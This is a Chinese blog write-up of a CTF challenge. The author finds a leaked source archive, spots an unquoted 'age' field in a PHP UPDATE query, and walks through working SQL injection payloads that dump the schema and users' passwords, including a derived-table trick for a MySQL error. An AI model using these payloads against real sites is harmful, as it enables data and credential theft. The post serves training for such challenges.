好烦啊干啥都得注册_update注入

最新推荐文章于 2022-10-26 14:33:30 发布
最新推荐文章于 2022-10-26 14:33:30 发布
阅读量269 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_KolaFish_Y/article/details/115822096
版权

好烦啊干啥都得注册_update注入

0x01.dirsearch扫一下发现有www.tar.gz源码泄露

0x02.审计以下源码

在update.php文件中首先可以看到代码对上传的数据addslashes转义。

if(!get_magic_quotes_gpc())
foreach($_POST as $key=>$value){
    $_POST[$key]=addslashes($value);
}

0x03.观察sql语句发现age没有单引号包裹

$query=$mysqli->query("update users set age=$_POST[age],nickname='$_POST[nickname]',description='$_POST[description]' where id=$_SESSION[id]");

0x04,构造poc

(select 123)

在这里插入图片描述

在这里插入图片描述

可以看到age确实变为123了.

0x05.构造exp

1.爆库

(select database())

在这里插入图片描述

2.爆表

(select group_concat(table_name) from information_schema.tables where table_schema=database())

在这里插入图片描述

3.爆字段

(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)

在这里插入图片描述

其实在知道只有一个users数据表时可以看看源码中的users字段.

4.爆数据

(select group_concat(username) from users)

(select description from users where username=0x61646d696e)

前面两个sql语句报错,baidu发现https://www.pianshen.com/article/4521309078/

在这里插入图片描述

爆了这个错误,继续baidu,发现这个错误意思是不能先select出同一表中的某些值,再update这个表(在同一语句中)。恍然大悟,总算找到问题所在:)

将select出的结果再通过中间表select一遍,这样就规避了错误。注意,这个问题只出现于mysql,mssql和oracle不会出现此问题。修改payload:

(select * from (select GROUP_CONCAT(username,0x7e,password,0x7e,description) from users)as a)

在这里插入图片描述

Dr@g0n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1587
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
wsl_update_x64 .zip
12-24
标题 "wsl_update_x64 .zip" 暗示我们正在处理一个与Windows子系统 for Linux(WSL)更新相关的文件。这个压缩包包含了一个名为 "wsl_update_x64.msi" 的Windows安装程序文件,这通常用于在Windows操作系统上安装或...
MySQL常用操作
ThisIsSunshine的博客
11-25 1021
本地连接 以管理员身份打开cmd,找到自己MySQL所在位置(我的在D盘)进入D盘后输入我们MySQL的具体信息,然后回车 cd D:\MySQL\mysql-5.7.20-winx64\bin 然后输入 (root的默认密码为123456) mysql -u root -p123456 回车 至此我们就完成了本地连接! ...
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 4973
SQL注入_insert&delete&update&selete
SpringBoot中使用SpringDataJPA
小石潭记丶
06-20 412
SpringDataJPA的使用 JPA是什么? JPA(Java Persistence API)是Sun官方提出的Java持久化规范. 为Java开发人员提供了一种对象/关联映射工具来管理Java应用中的关系数据. 它的出现是为了简化现有的持久化开发工作和整合ORM技术. 结束各个ORM框架各自为营的局面. JPA仅仅是一套规范,不是一套产品, 也就是说Hibernate, TopLink等是实现了JPA规范的一套产品. Spring Data JPA Spring Data JPA是Sp
SQL语句备忘
YoungIvan学习笔记
02-18 333
建立表 create table T_Person1(Id int not null,Name nvarchar(50),Age int null);   插入数据 insert into T_Person1(id,name,age) values (1,'Jim',20);   删除表  drop table T_Person1;   更新数据 update T_Person
windows10 wsl_update_x64.zip wsl_update_x64.exe
11-26
标题中的“windows10 wsl_update_x64.zip”指的是Windows 10操作系统的一个更新工具,主要用于升级或安装Windows Subsystem for Linux (WSL)的更新。WSL是微软为Windows 10引入的一项功能,它允许用户在不启动完整...
Enfocus_PitStop_Pro_10_Update2_Patch
04-10
Enfocus_PitStop_Pro_10_Update2_Patch Acrobat 的插件,可以去除水印等 如果你用了PP10,请更新到update2 在论坛上卖很贵了,我从国外网站上找来分享给大家。 使用方法见压缩包内文本文件。
Aptio_V_AMI_Firmware_Update_Utility_V5.15.03.0081.zip
07-31
标题 "Aptio_V_AMI_Firmware_Update_Utility_V5.15.03.0081.zip" 指向的是一个用于更新AMI Aptio V固件的工具包,版本号为5.15.03.0081。这个软件包是由American Megatrends Inc.(AMI)提供的官方完整版,旨在帮助...
flutter_in_app_update:Flutter插件
05-04
提出者 由维护in_app_update 使用官方的Android API在Android上启用In App Updates。文献资料公开了以下方法: Future<AppUpdateInfo> checkForUpdate() :检查是否有可用的更新Future<void> performImmediateUpdate...
wsl_update_x64.msi 不要积分,不要钱
08-15
标题中的“wsl_update_x64.msi”指的是Windows Subsystem for Linux (WSL) 的更新程序,这是一个针对Windows 10操作系统的组件,允许用户在Windows环境下直接运行Linux发行版。这个文件可能是微软官方发布的一个升级...
jd-eclipse Eclipse官方反编译插件jdeclipse_update_site
04-20
2,jdeclipse_update_site.zip下载好了之后,解压,将plugins文件下的jd.ide.eclipse_0.1.3.jar和jd.ide.eclipse.win32.x86_0.1.3.jar 复制到eclipse安装目录下的plugins里 ,假设eclipse的安装目录为:D:\soft\...
Linux 内核更新包 wsl_update_x64
09-16
wsl_update_x64 Linux 内核更新包 wsl_update_x64 Linux 内核更新包 wsl_update_x64 Linux 内核更新包 wsl_update_x64 Linux 内核更新包 wsl_update_x64 Linux 内核更新包 wsl_update_x64 Linux 内核更新包 wsl_...
PB_update.rar_pb_pb更新_update pb
07-15
pb 客户端自动更新程序,可以形成局域网内部或者网络空间更新
(转-收集)MSSQL手工注入语句集合
weixin_30553837的博客
04-16 258
andexists(select*fromsysobjects)//判断是否是MSSQL andexists(select*fromtableName)//判断某表是否存在..tableName为表名 and1=(select@@VERSION)//MSSQL版本 And1=(selectdb_name())//当前数据库名 and1=(select@...
SQL注入教程
热门推荐
weixin_51047454的博客
03-17 1万+
sql注入教程
MSSQL数据库注入(一)
hhhshd的博客
11-17 5380
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
MySql注入科普
养在鱼缸的鱼
06-01 170
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ' 假 '' 真 " ...
lv_chart_set_update_mode
最新发布
06-11
lv_chart_set_update_mode() 函数用于设置图表的更新模式。它有两个参数:第一个参数是要设置的图表对象,第二个参数是更新模式。更新模式可以是 LV_CHART_UPDATE_MODE_CIRCULAR 或 LV_CHART_UPDATE_MODE_SHIFT。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值